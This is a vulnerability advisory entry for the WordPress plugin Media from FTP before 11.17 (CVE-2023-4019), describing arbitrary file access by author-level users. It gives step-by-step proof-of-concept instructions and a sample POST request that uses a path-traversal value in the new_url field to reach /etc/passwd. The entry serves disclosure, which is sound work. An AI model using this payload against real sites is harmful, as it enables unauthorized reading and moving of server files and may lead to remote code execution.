Lucene search
Dmitrii IgnatyevWPEX-ID:0D323B07-C6E7-4ABA-85BC-64659AD0C85DHistoryAug 14, 2023 - 12:00 a.m.
Media from FTP < 11.17 - Author+ Arbitrary File Access
2023-08-1400:00:00
Dmitrii Ignatyev
37
ftp server
arbitrary file access
exploit
security vulnerability
wordpress plugin
Description The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases. In 11.16, the manage_options capability was used, however is still insufficient in case of MultiSite setups
1) Go to /wp-admin/admin.php?page=mediafromftp-search-register
2) Select any file from the media text list below
3) Click "Update Media"
4) Intercept request with action=mediafromftp-update-ajax-action
5) Change "new_url" by adding the following to the file path: /../../../../../../../../../../etc/passwd
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36Related
cvelist
cvelist
CVE-2023-4019 Media from FTP < 11.17 - Author+ Arbitrary File Access
2023-09-04 11:27:02
nvd
nvd
CVE-2023-4019
2023-09-04 12:15:10
cve
cve
CVE-2023-4019
2023-09-04 12:15:10
prion
prion
Code injection
2023-09-04 12:15:00
wpvulndb
wpvulndb
Media from FTP < 11.17 - Author+ Arbitrary File Access
2023-08-14 00:00:00
wordfence
wordfence
AI Score
8.7
Confidence
High
EPSS
0.001
Percentile
37.1%
Related for WPEX-ID:0D323B07-C6E7-4ABA-85BC-64659AD0C85D